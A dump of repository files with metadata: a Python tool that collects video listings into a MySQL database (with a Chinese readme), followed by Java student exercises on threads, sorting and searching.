[ { "alpha_fraction": 0.7136812210083008, "alphanum_fraction": 0.7193229794502258, "avg_line_length": 17.153846740722656, "blob_id": "1af6b9083ccec78e89f0104bac48d961927bb80f", "content_id": "231ae4e89fcbdab2d791fa590a7a587efaf223a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 781, "license_type": "no_license", "max_line_length": 38, "num_lines": 39, "path": "/oa/create_table.sql", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "drop table if exists room;\ndrop table if exists staff;\n\n\n\ncreate table room(\n\tid integer primary key,\n\tnum text,\n\tdepartment text,\n\ttel text,\n\ttel2 text,\n\tlittletel text, \n\tlittletel2 text\n);\n\ncreate table staff(\n\tid integer primary key,\n\tname text,\n\troom_id integer,\n\tcellphone text,\n\tcellphone2 text,\n\tlittlephone text, \n\tlittlephone2 text,\n\tipaddress text\n);\n\ncreate table document(\n\tid integer primary key autoincrement,\n\tserial_number integer, -- 顺序号\n\treceived_date date, -- 收文日期\n\tfrom_department text, -- 来文机关\n\tdocument_number text, -- 文件号码\n\tsecret_degree text, -- 秘密程度\n\tdocument_date date, -- 文件日期\n\tdocument_name text, -- 文件名称\n\tcopy integer, -- 份数\n\tto_staff text, -- 交办人\n\trecycle_date date -- 收回日期\n);\n\n" }, { "alpha_fraction": 0.6278026700019836, "alphanum_fraction": 0.6457399129867554, "avg_line_length": 19.363636016845703, "blob_id": "c57c0795371856b244baf117538963b0e644c4fe", "content_id": "cd083388c8f8f657e31c5e6cfe84ef8fc7d697be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/oa/fuck_qt.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "import sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n dialog = QDialog()0\n dialog.show()\n sys.exit(app.exec_())" }, { "alpha_fraction": 0.6379234194755554, "alphanum_fraction": 0.6467223763465881, "avg_line_length": 28.921052932739258, "blob_id": "9400ae9786191b49e4d9d3553bbec19c13db4bf3", "content_id": "c94967a1ca4bc5d24d727e7b7746d5a3647cacaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2273, "license_type": "no_license", "max_line_length": 103, "num_lines": 76, "path": "/oa/fuck_print.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QScrollArea, QAction, QMenu\nfrom PyQt5.QtGui import QPalette, QImage, QPixmap, QPainter\n\n\nfrom PyQt5.QtPrintSupport import QPrinter, QPrintDialog\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n self.printer = QPrinter()\n\n self.imageLabel = QLabel()\n self.imageLabel.setBackgroundRole(QPalette.Base)\n self.imageLabel.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)\n\n #self.scrollArea =QScrollArea()\n #self.scrollArea.setBackgroundRole(QPalette.Dark)\n #self.scrollArea.setWidget(self.imageLabel)\n \n\n #self.setCentralWidget(self.scrollArea)\n self.setCentralWidget(self.imageLabel)\n\n self.image = QImage('lifecycle.png')\n self.imageLabel.setPixmap(QPixmap.fromImage(self.image))\n\n\n self.createActions()\n self.createMenus()\n\n self.setWindowTitle('fuckprint')\n self.resize(self.image.width(), self.image.height())\n\n self.printimg()\n\n def 
printimg(self):\n self.printer.setPageSize(QPrinter.A4)\n self.printer.setPageMargins(0, 0, 0, 0, QPrinter.Millimeter)\n\n print(type(QPrinter.A4))\n\n dialog = QPrintDialog(self.printer, self)\n if dialog.exec_():\n painter = QPainter(self.printer)\n width = painter.window().width()\n height = painter.window().height()\n #width2 = self.printer.width()\n #height2 = self.printer.height()\n\n #painter.drawLine(0, 0, , )\n\n painter.drawText(200, 200, 'heheheheheh')\n\n\n def createActions(self):\n self.printAction = QAction('&Print...', self, shortcut='Ctrl+P', triggered=self.printimg)\n self.exitAction = QAction('&Exit...', self, shortcut='Ctrl+Q', triggered=self.close)\n\n def createMenus(self):\n self.fileMenu = QMenu('&File', self)\n self.fileMenu.addAction(self.printAction)\n self.fileMenu.addAction(self.exitAction)\n\n self.menuBar().addMenu(self.fileMenu)\n\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n mainWin = MainWindow()\n mainWin.show()\n sys.exit(app.exec_())" }, { "alpha_fraction": 0.5663145780563354, "alphanum_fraction": 0.5751173496246338, "avg_line_length": 17.322580337524414, "blob_id": "b9c813228ad71dae8e834a7c82f62b72f54d08ff", "content_id": "a6a624c6a39fd93eac70a2c39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1704, "license_type": "no_license", "max_line_length": 89, "num_lines": 93, "path": "/oa/PhoneNumber/dialog.cpp", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "#include \"dialog.h\"\n#include \"ui_dialog.h\"\n\n#include<QSqlDatabase>\n#include<QSqlQuery>\n#include<QDebug>\n\n\nbool Dialog::connect_db()\n{\n QSqlDatabase db = QSqlDatabase::addDatabase(\"QSQLITE\");\n db.setDatabaseName(\"C:\\\\develop\\\\oa\\\\oa\\\\database.db\");\n if (db.open())\n {\n qDebug()<<\"open db success!\";\n return true;\n }\n else\n {\n qDebug()<<\"open db failed!\";\n return false;\n }\n}\n\nQString Dialog::query_room(QString num)\n{\n QString ret ;\n\n QSqlQuery query;\n query.prepare(\"select department from room where littletel=:lt1 or littletel2=:lt2\");\n query.bindValue(\":lt1\", num);\n query.bindValue(\":lt2\", num);\n query.exec();\n\n if(query.first())\n {\n ret = query.value(\"department\").toString();\n }\n return ret;\n}\n\nQString Dialog::query_staff(QString num)\n{\n QString ret ;\n\n QSqlQuery query;\n query.prepare(\"select name from staff where littlephone=:lp1 or littlephone2=:lp2\");\n query.bindValue(\":lp1\", num);\n query.bindValue(\":lp2\", num);\n query.exec();\n\n if(query.first())\n {\n ret = query.value(\"name\").toString();\n }\n return ret;\n}\n\nDialog::Dialog(QWidget *parent) :\n QDialog(parent),\n ui(new Ui::Dialog)\n{\n ui->setupUi(this);\n connect_db();\n\n\n}\n\nDialog::~Dialog()\n{\n delete ui;\n}\n\nvoid Dialog::on_numberLineEdit_textChanged(const QString &arg1)\n{\n qDebug()<<\"==============================\";\n qDebug()<<\"arg1: \"<<arg1;\n\n QString department = query_room(arg1);\n if (!department.isEmpty())\n {\n ui->nameLabel->setText(department);\n }\n else\n {\n QString name = query_staff(arg1);\n if (!name.isEmpty())\n {\n ui->nameLabel->setText(name);\n }\n }\n\n\n\n}\n" }, { "alpha_fraction": 0.6064981818199158, "alphanum_fraction": 0.6064981818199158, "avg_line_length": 33.625, "blob_id": "230b546a450e15a226d37841c85c89cf4a2eec5d", "content_id": "35a998f8ca812bc456f6c21ac9ead07e8c469c25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, 
"max_line_length": 77, "num_lines": 8, "path": "/oa/obj.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "class Staff:\n def __init__(self, id, name, room_id, cellphone, littlephone, ipaddress):\n self.id = id\n self.name = name\n self.room_id = room_id\n self.cellphone = cellphone\n self.littlephone = littlephone\n self.ipaddress = ipaddress\n" }, { "alpha_fraction": 0.647962212562561, "alphanum_fraction": 0.6597755551338196, "avg_line_length": 19.658536911010742, "blob_id": "119d361dcf8b8e57bae742ec455ff7f49417f55c", "content_id": "efd223248d9bd7340581a1c637acc42fac64bc51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1693, "license_type": "no_license", "max_line_length": 85, "num_lines": 82, "path": "/oa/lib_of_db_and_xls.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "import xlrd\nimport sqlite3\nimport datetime\nfrom obj import Staff\n\t\nxls_file_name = 'database.xlsx'\ndb_file_name = 'database.db'\nsql_script = 'create_table.sql'\n\ndef create_table():\n\twith open(sql_script) as sql_script_file:\n\t\tcon = sqlite3.connect(db_file_name)\n\t\tcur = con.cursor()\n\t\tcur.executescript(sql_script_file.read())\n\t\tcon.commit()\n\t\tcon.close()\n\ndef insert(sql, data = None):\n\t#with open(sql_script) as sql_script_file:\n\tcon = sqlite3.connect(db_file_name)\n\tcur = con.cursor()\n\tif data:\n\t\tcur.execute(sql, data)\n\telse:\n\t\tcur.execute(sql)\n\tcon.commit()\n\tcon.close()\n\n\n\ndef insert_many(sql, data):\n\tcon = sqlite3.connect(db_file_name)\n\tcur = con.cursor()\n\tcur.executemany(sql, data)\n\tcon.commit()\n\tcon.close()\n\n\ndef main():\n\tcreate_table()\n\tworkbook = xlrd.open_workbook(xls_file_name)\n\tfor sheet in workbook.sheets():\n\t\ttable_name = sheet.name\n\t\tcolumn_names = sheet.row_values(0)\n\t\tdata = [] #list of list of datas\n\t\tfor i in range(1, sheet.nrows):\n\t\t\tdata.append(sheet.row_values(i))\n\n\t\tcolumn_names_sql = ''\n\t\tfor index, field in enumerate(column_names):\n\t\t\tcolumn_names_sql += field\n\t\t\tif index+1 < len(column_names):\n\t\t\t\tcolumn_names_sql += ', '\n\n\t\twenhaos_sql = '?,'*(len(column_names)-1)+'?'\n\t\t#insert into table(name1, name2)values(?, ?)\n\t\tsql2 = 'insert into %s(%s) values (%s)'%(table_name, column_names_sql, wenhaos_sql)\n\t\t\n\t\tinsert_many(sql2, data)\n\t\t\n\n#export\ndef get_name_by_number(num):\n\tcon = sqlite3.connect(db_file_name)\n\tcur = con.cursor()\n\tcur.execute('select * from staff where littlephone = ?', (num,))\n\tres = cur.fetchall() \n\tif len(res) == 1:\n\t\tprint res[0]\n\n\tcon.commit()\n\tcon.close()\n\n\n\n\n\t\t\n\n\nif __name__ == '__main__':\n\tmain()\n\t#get_name_by_number('61955')" }, { "alpha_fraction": 0.624221920967102, "alphanum_fraction": 0.6398719549179077, "avg_line_length": 35.04487228393555, "blob_id": "8217086a6c5772f19b155db2649c60ba07e76183", "content_id": "d87957fb0b477c00daf6b01cfc8e74f72270a9c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5739, "license_type": "no_license", "max_line_length": 96, "num_lines": 156, "path": "/oa/document_manage.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*- \nfrom lib_of_db_and_xls import *\n\nimport sys\nfrom PyQt5.QtCore import Qt, QRect\nfrom PyQt5.QtGui import QFont, QPainter\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtPrintSupport import QPrintDialog, QPrinter\n\n\nclass DocumentRecorder(QWidget):\n def __init__(self, 
parent=None):\n super(DocumentRecorder, self).__init__(parent)\n\n self._font = QFont()\n self._font.setPointSize(36)\n\n serial_number_label = QLabel(u\"顺序号:\")\n serial_number_label.setFont(self._font)\n self.serial_number_line = QLineEdit(u'1')\n self.serial_number_line.setFont(self._font)\n\n received_date_label = QLabel(u\"收文日期:\")\n received_date_label.setFont(self._font)\n self.received_date_line = QLineEdit(u'2017-02-07')\n self.received_date_line.setFont(self._font)\n\n from_department_label = QLabel(u\"来文机关:\")\n from_department_label.setFont(self._font)\n self.from_department_line = QLineEdit(u'枣组通字')\n self.from_department_line.setFont(self._font)\n\n document_number_label = QLabel(u\"文件号码:\")\n document_number_label.setFont(self._font)\n self.document_number_line = QLineEdit(u'3')\n self.document_number_line.setFont(self._font)\n\n secret_degree_label = QLabel(u\"秘密程度:\")\n secret_degree_label.setFont(self._font)\n self.secret_degree_line = QLineEdit(u'')\n self.secret_degree_line.setFont(self._font)\n\n document_date_label = QLabel(u\"文件日期:\")\n document_date_label.setFont(self._font)\n self.document_date_line = QLineEdit(u'2017-01-23')\n self.document_date_line.setFont(self._font)\n\n document_name_label = QLabel(u\"文件名称:\")\n document_name_label.setFont(self._font)\n self.document_name_line = QLineEdit(u'关于转发鲁组字[2016]63号文件的通知')\n self.document_name_line.setFont(self._font)\n\n copy_label = QLabel(u\"份数:\")\n copy_label.setFont(self._font)\n self.copy_line = QLineEdit()\n self.copy_line.setFont(self._font)\n\n to_staff_label = QLabel(u\"交办人:\")\n to_staff_label.setFont(self._font)\n self.to_staff_line = QLineEdit(u'陈')\n self.to_staff_line.setFont(self._font)\n\n recycle_date_label = QLabel(u\"收回日期:\")\n recycle_date_label.setFont(self._font)\n self.recycle_date_line = QLineEdit()\n self.recycle_date_line.setFont(self._font)\n\n self.submit_button = QPushButton('&submit')\n self.submit_button.setFont(self._font)\n self.submit_button.show()\n self.submit_button.clicked.connect(self.submit)\n\n self.print_button = QPushButton('&print')\n self.print_button.setFont(self._font)\n self.print_button.show()\n self.print_button.clicked.connect(self._print)\n\n buttonLayout = QHBoxLayout()\n buttonLayout.addWidget(self.submit_button)\n buttonLayout.addWidget(self.print_button)\n\n mainLayout = QGridLayout()\n mainLayout.addWidget(serial_number_label, 0, 0)\n mainLayout.addWidget(self.serial_number_line, 0, 1)\n\n mainLayout.addWidget(received_date_label, 1, 0)\n mainLayout.addWidget(self.received_date_line, 1, 1)\n\n mainLayout.addWidget(from_department_label, 2, 0)\n mainLayout.addWidget(self.from_department_line, 2, 1)\n\n mainLayout.addWidget(document_number_label, 3, 0)\n mainLayout.addWidget(self.document_number_line, 3, 1)\n\n mainLayout.addWidget(secret_degree_label, 4, 0)\n mainLayout.addWidget(self.secret_degree_line, 4, 1)\n\n mainLayout.addWidget(document_date_label, 5, 0)\n mainLayout.addWidget(self.document_date_line, 5, 1)\n\n mainLayout.addWidget(document_name_label, 6, 0)\n mainLayout.addWidget(self.document_name_line, 6, 1)\n\n mainLayout.addWidget(copy_label, 7, 0)\n mainLayout.addWidget(self.copy_line, 7, 1)\n\n mainLayout.addWidget(to_staff_label, 8, 0)\n mainLayout.addWidget(self.to_staff_line, 8, 1)\n\n mainLayout.addWidget(recycle_date_label, 9, 0)\n mainLayout.addWidget(self.recycle_date_line, 9, 1)\n\n mainLayout.addLayout(buttonLayout, 10, 1)\n\n self.setLayout(mainLayout)\n self.setWindowTitle(\"收文登记\")\n\n def submit(self):\n serial_number = 
self.serial_number_line.text()\n received_date = self.received_date_line.text()\n from_department = self.from_department_line.text()\n document_number = self.document_number_line.text()\n secret_degree = self.secret_degree_line.text()\n document_date = self.document_date_line.text()\n document_name = self.document_name_line.text()\n copy = self.copy_line.text()\n to_staff = self.to_staff_line.text()\n recycle_date = self.recycle_date_line.text()\n\n sql = \"\"\"\n \tinsert into document(\n\t\tserial_number, received_date, from_department, document_number, secret_degree, \n\t\tdocument_date, document_name, copy, to_staff, recycle_date) values\n\t\t(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n\t\t\"\"\"\n data = (serial_number, received_date, from_department, document_number, secret_degree, \\\n document_date, document_name, copy, to_staff, recycle_date)\n insert(sql, data)\n\n def _print(self):\n printer = QPrinter()\n dialog = QPrintDialog(printer, self)\n if dialog.exec_():\n painter = QPainter(printer)\n rect = QRect(10, 20, 80, 60)\n painter.drawEllipse(rect)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n dr = DocumentRecorder()\n # dr.resize(800, 600)\n # w.setWindowTitle('fuck')\n dr.show()\n\n sys.exit(app.exec_())\n" } ]
7
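The `submit` handler in the DocumentRecorder file above builds a `?`-placeholder INSERT and hands it, with a value tuple, to an `insert(sql, data)` helper that lives elsewhere in that repository and is not shown in this snapshot. A minimal sketch of what such a helper could look like, assuming sqlite3 (which uses exactly this `?` placeholder style); the `documents.db` file name is an invented illustration, not taken from the repo:

```python
import sqlite3

def insert(sql, data):
    # Bind `data` into a '?'-placeholder statement; the driver escapes
    # each value, which matters since the form fields are free text.
    conn = sqlite3.connect('documents.db')  # assumed database file
    try:
        with conn:  # commits on success, rolls back on exception
            conn.execute(sql, data)
    finally:
        conn.close()
```

Parameter binding is why the handler can pass raw `QLineEdit` text straight through without any quoting of its own.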
bytesniffer/collectMovies
https://github.com/bytesniffer/collectMovies
b7fad25635ac2733ad70efaebf6101333916ac55
5294a9de8486922452e03f1b4fa75dcd4b54ecd4
4fd4bfdaaba1a537a79462ca43a8b1847f3dd6d1
refs/heads/master
2020-06-13T01:18:07.526446
2019-07-18T01:02:03
2019-07-18T01:02:03
194,486,214
0
0
null
2019-06-30T07:06:46
2019-04-17T13:35:32
2019-03-26T02:53:43
null
[ { "alpha_fraction": 0.4918753504753113, "alphanum_fraction": 0.49397820234298706, "avg_line_length": 41.16935348510742, "blob_id": "eb23384f0ecc34ac52f2907a7fa6d7c0e4a2fdd8", "content_id": "2f7c86d7bdb3e6c7efa81c5593c46bf03d1fe559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5231, "license_type": "no_license", "max_line_length": 118, "num_lines": 124, "path": "/collect/db/database.py", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "import pymysql\nimport time\nimport logging\n\n\nclass MacVod:\n def __init__(self,log_config ,mac_type_mapper, dbconfig):\n self.__dbconfig = dbconfig\n self.__log_config = log_config\n self.__db = pymysql.connect(self.__dbconfig['url'],\n self.__dbconfig['user'],\n self.__dbconfig['passwd'],\n self.__dbconfig['db'],\n charset='utf8')\n self.__cursor = self.__db.cursor()\n self.__mac_type_mapper = mac_type_mapper\n self.__mac_type_pid_mapper = self.__mac_type_pid_mapper()\n self.__logger = logging.getLogger(__name__)\n self.__logger.setLevel(logging.INFO)\n fhandler = logging.FileHandler(self.__log_config['file'])\n fhandler.setLevel(logging.INFO)\n formatter = logging.Formatter(self.__log_config['pattern'])\n fhandler.setFormatter(formatter)\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n self.__logger.addHandler(console)\n self.__logger.addHandler(fhandler)\n\n def insert_mac_vod(self, vod):\n\n insert_sql = \"\"\"INSERT INTO mac_vod(vod_id,type_id,type_id_1,vod_name,vod_year,\n vod_pic,vod_actor,vod_director,vod_remarks,vod_state,\n vod_lang,vod_class,vod_area,vod_play_from,vod_content,vod_play_server,\n vod_play_url,vod_down_url,vod_time,vod_time_add,\n vod_status) values({})\"\"\".format(\n self.__format_values(vod))\n\n try:\n self.__cursor.execute(insert_sql)\n self.__db.commit()\n except:\n self.__db.rollback()\n\n def update_mac_vod(self, vod):\n filed_values = \"\"\"\n vod_remarks='{marks}',vod_state='{state}',vod_play_url='{play_url}'\n \"\"\".format(marks=vod.note(),\n state=vod.state(),\n play_url=vod.content())\n condition = 'vod_id ={}'.format(vod.id())\n self.update('mac_vod', filed_values, condition)\n\n def __format_values(self, vod):\n type_id = self.__mac_type_mapper.get(int(vod.tid()), -1)\n vod_status = 1\n if type_id < 0:\n self.__logger.info('not found type id:{},{}'.format(vod.id(),\n vod.type()))\n vod_status = -1\n values = \"\"\"{vod_id},{type_id},{type_id_1},'{vod_name}',{vod_year},'{vod_pic}','{vod_actor}',\\\n '{vod_director}','{vod_remarks}',{vod_state},'{vod_language}','{vod_class}','{vod_area}','{vod_play_from}',\\\n '{vod_content}','{vod_play_server}','{vod_play_url}',' ',{vod_time},{vod_time_add},{vod_status}\n \"\"\".format(vod_id=vod.id(),\n type_id=type_id,\n type_id_1=self.__mac_type_pid_mapper[type_id],\n vod_name=vod.name(),\n vod_year=vod.year(),\n vod_pic=vod.pic(),\n vod_actor=vod.actor(),\n vod_director=vod.director(),\n vod_remarks=vod.note(),\n vod_state=vod.state(),\n vod_language=str(vod.lang()),\n vod_class=vod.type(),\n vod_area=vod.area(),\n vod_play_from=vod.content_flag(),\n vod_content=vod.des(),\n vod_play_server='no',\n vod_play_url=vod.content(),\n vod_time=self.__date_timestamp(vod.last_update()),\n vod_time_add=int(time.time()),\n vod_status=vod_status)\n return values\n\n def __date_timestamp(self, d):\n timestamp = time.strptime(d, '%Y-%m-%d %H:%M:%S')\n return time.mktime(timestamp)\n\n def update(self, table, field_values, condition):\n update_sql = \"\"\"\n update {} set {}\n 
\"\"\".format(table, field_values)\n if condition is not None:\n update_sql += \"where {}\".format(condition)\n self.__cursor.execute(update_sql)\n\n def delete(self, sql):\n self.__cursor.execute(sql)\n\n def select(self, table, condition, columns):\n select_sql = \"\"\"\n select {}\n from {} \"\"\".format(columns, table)\n if condition is not None:\n select_sql += \"where {}\".format(condition)\n self.__cursor.execute(select_sql)\n return self.__cursor.fetchall()\n\n def __mac_type_pid_mapper(self):\n columns = \"type_id,type_pid\"\n records = self.select('mac_type', None, columns)\n map = {}\n for r in records:\n map[r[0]] = r[1]\n return map\n\n def select_mac_columns(self):\n columns = \"\"\"vod_id,type_id,type_id_1,vod_name,vod_year,vod_pic,vod_actor,\n vod_director,vod_state,vod_language,vod_class,vod_area,vod_play_from,\n vod_content,vod_play_note,vod_time,vod_time_add,vod_status\"\"\"\n return columns\n\n def close(self):\n self.__db.close()\n\n\n" }, { "alpha_fraction": 0.509956955909729, "alphanum_fraction": 0.5131862163543701, "avg_line_length": 39.326087951660156, "blob_id": "afb3649fba1b65ce17cdb6fb570f27e8efa3d0c5", "content_id": "15a92af6f0e186369b306b361a179dbf034428de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3716, "license_type": "no_license", "max_line_length": 97, "num_lines": 92, "path": "/collect/parser/dbzyz/tracker.py", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "import logging\nimport _thread\nimport threading\nfrom db.database import MacVod\nimport time\nimport sys\n\n\nclass MovieTracker:\n\n def __init__(self, config, threads, task_queue):\n self.__config = config\n self.__task_queue = task_queue\n self.__stop = threading.Event()\n self.__threads = threads\n self.__log_config = config['log']\n self.__mac_vod_db = MacVod(config['log'], config['dbzyzmactype'], config['database'])\n self.__movie_id_set = self.__all_movie_ids()\n self.__tv_stats=self.__all_tv_id_stat()\n self.__logger = logging.getLogger(__name__)\n self.__logger.setLevel(logging.INFO)\n fhandler = logging.FileHandler(self.__log_config['file'])\n fhandler.setLevel(logging.INFO)\n formatter = logging.Formatter(self.__log_config['pattern'])\n fhandler.setFormatter(formatter)\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n self.__logger.addHandler(console)\n self.__logger.addHandler(fhandler)\n\n def start(self):\n self.__logger.info('started')\n for tid in range(self.__threads):\n self.__logger.info('starting tacker {}!'.format(tid))\n _thread.start_new_thread(self.run, (tid,))\n\n def run(self, tid):\n while not self.__stop.is_set():\n vod_event = self.__task_queue.get()\n self.__process(tid, vod_event)\n self.__logger.info(\"movie tracker {} stopped !\".format(tid))\n\n def __process(self, tid, vod_event):\n self.__logger.info('{} process {}'.format(tid, vod_event))\n vod_id = int(vod_event.id())\n if vod_id in self.__movie_id_set:\n # update\n note = str(vod_event.note())\n stat = int(vod_event.state())\n # feedback result stat not sync with note\n if stat == 0 and note.isdigit() and int(note) > 0:\n stat = int(note)\n vod_event.vod()['state'] = vod_event.note()\n old_stat = int(self.__tv_stats.get(vod_id, sys.maxsize))\n if stat > 0 and old_stat < stat:\n self.__logger.info('update tv id {},name {}'.format(vod_id,vod_event.name()))\n self.__mac_vod_db.update_mac_vod(vod_event)\n else:\n self.__logger.info('ignore update {} {}'.format(vod_id, vod_event.name()))\n\n else:\n 
self.__mac_vod_db.insert_mac_vod(vod_event)\n self.__logger.info('new vod id:{},name:{}'.format(vod_id, vod_event.name()))\n self.__movie_id_set.add(int(vod_id))\n\n def __type_filter(self, vod_event):\n print('type filter')\n\n def stop(self):\n # wait for queued vod events to be consumed before shutting down\n while not self.__task_queue.empty():\n time.sleep(5)\n self.__stop.set()\n self.__logger.info('event queue is empty')\n self.__mac_vod_db.close()\n\n def __all_movie_ids(self):\n columns = 'vod_id'\n id_tuples = self.__mac_vod_db.select('mac_vod', None, columns)\n id_set = set()\n for id_t in id_tuples:\n id_set.add(id_t[0])\n return id_set\n\n def __all_tv_id_stat(self):\n columns = 'vod_id,vod_state'\n condition = 'type_id_1 in(2,3,4)'\n vod_stat = self.__mac_vod_db.select('mac_vod', condition, columns)\n stat_map = {}\n for stat in vod_stat:\n stat_map[stat[0]] = stat[1]\n return stat_map\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7032967209815979, "alphanum_fraction": 0.7655677795410156, "avg_line_length": 23.81818199157715, "blob_id": "794e51684797a49777ce9b761ca8bd38f97c6842", "content_id": "d04fc325ab33ab40cf55aae573d2ae358f121bbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 501, "license_type": "no_license", "max_line_length": 87, "num_lines": 11, "path": "/readme.md", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "### Open-sourcing the video site I use myself: truly automatic collection, no manual updates needed\n>The site currently runs as a personal subscription account: send it a video title and it replies with the matching results. If anyone is interested in the subscription-account setup, leave a message and I will write up a detailed tutorial when I have time\n\n![image](./public/images/11.png)\n\n### Usage tutorial\n>[http://www.tengewang.cn/archives/363.html](http://www.tengewang.cn/archives/363.html)\n\n### If you find it useful, a star is appreciated. Thanks!\n\n### Technical discussion QQ group: 592148970\n" }, { "alpha_fraction": 0.6192411780357361, "alphanum_fraction": 0.6192411780357361, "avg_line_length": 34.0476188659668, "blob_id": "ccdc37a3ac0e835e2eaf3ab3a37f128801a5056d", "content_id": "7529c4027efee8d46efae88cfae3530fd8701c42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "no_license", "max_line_length": 67, "num_lines": 21, "path": "/collect/parser/dbzyz/updator.py", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "\nimport logging\n\n\nclass MovieUpdator:\n\n    def __init__(self, log_config, tid, task_queue, stop):\n        # .Thread.__init__(self)\n        self.__log_config=log_config\n        self.__tid = tid\n        self.__task_queue = task_queue\n        self.__stop = stop\n        self.__logger = logging.getLogger(__name__)\n        self.__logger.setLevel(logging.INFO)\n        fhandler = logging.FileHandler(self.__log_config['file'])\n        fhandler.setLevel(logging.INFO)\n        formatter = logging.Formatter(self.__log_config['pattern'])\n        fhandler.setFormatter(formatter)\n        console = logging.StreamHandler()\n        console.setLevel(logging.INFO)\n        self.__logger.addHandler(console)\n        self.__logger.addHandler(fhandler)\n\n" } ]
4
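`MacVod.insert_mac_vod` above splices titles, remarks and play URLs into its INSERT statement with `str.format`, so a stray quote in a video name can break the query. A hedged sketch, not the project's actual code, of the same insert done through pymysql's own parameter binding; the four-column subset is an illustration, not the table's full column list:

```python
import pymysql

def insert_mac_vod(db, vod_values):
    # %s placeholders are escaped by pymysql itself, so quotes inside
    # vod_name or vod_play_url cannot alter the statement.
    sql = ("INSERT INTO mac_vod (vod_id, type_id, vod_name, vod_play_url) "
           "VALUES (%s, %s, %s, %s)")
    with db.cursor() as cursor:
        cursor.execute(sql, vod_values)
    db.commit()

# usage, given a connection opened as in MacVod.__init__:
# insert_mac_vod(db, (1, 2, "a title with 'quotes'", "http://example.com/play"))
```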
ankgitk/OOPlab
https://github.com/ankgitk/OOPlab
5aae07c235a08e66f1cbd29ccdfa6eb5bf7e4c7e
4fe2878d79363df6d22ea9690a292b2fc045fbb1
2857ebe93eb469cd085f7621d016e9dbb2029eba
refs/heads/master
2021-09-18T23:29:21.249824
2018-07-21T14:12:31
2018-07-21T14:12:31
111,445,735
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5960307121276855, "alphanum_fraction": 0.617157518863678, "avg_line_length": 15.806451797485352, "blob_id": "ac9a624d2afb9a1451c9afc916d807fb1f23abe5", "content_id": "637e0898ee6f417994c9ad84ba384db46e3383ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 60, "num_lines": 93, "path": "/ThreadDemo.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "import java.util.Random;\nimport java.util.Arrays;\nimport java.util.Scanner;\nclass Gen extends Thread\n{\n\tint i,array[];\n\tpublic Gen(int array[])\n\t{\n\t\tthis.array=array;\n\t}\n\tpublic void run()\n\t{\n\t\tRandom rand=new Random();\n\t\tSystem.out.println(\"Generated Random Numbers\");\n\t\tfor(i=0;i<100;i++)\n\t\t{\n\t\t\tarray[i]=rand.nextInt(1000);\n\t\t\tSystem.out.println(array[i]);\n\t\t}\n\t\tSystem.out.println(\"\\n\");\n\t}\n}\nclass Sort extends Thread\n{\n\tprivate int array[];\n\tpublic Sort(int array[])\n\t{\n\t\tthis.array=array;\n\t}\n\tpublic void run()\n\t{\n\t\tint i;\n\t\tArrays.sort(array);\n\t\tSystem.out.println(\"Sorted Array\");\n\t\tfor(i=0;i<100;i++)\n\t\t{\n\t\t\tSystem.out.println(array[i]);\n\t\t}\n\t\tSystem.out.println(\"\\n\");\n\t}\n}\nclass Search extends Thread\n{\n\tprivate int array[],ele;\n\tpublic Search(int array[])\n\t{\n\t\tthis.array=array;\n\t}\n\tpublic void run()\n\t{\n\t\tint i,f=0;\n\t\tScanner s=new Scanner(System.in);\n\t\tSystem.out.println(\"Enter Element to search\");\n\t\tele=s.nextInt();\n\t\tfor(i=0;i<100;i++)\n\t\t{\n\t\t\tif(array[i]==ele)\n\t\t\t{\n\t\t\t\tf=1;\n\t\t\t\tSystem.out.println(\"Element \"+ele+\" found at index \"+i);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif(f==0)\n\t\t\tSystem.out.println(\"Element \"+ele+\" not found\");\n\t}\n}\nclass ThreadDemo\n{\n\tpublic static void main(String args[])\n\t{\n\t\tint i;\n\t\tint array[]=new int[100];\n\t\tGen g=new Gen(array);\n\t\tSort s=new 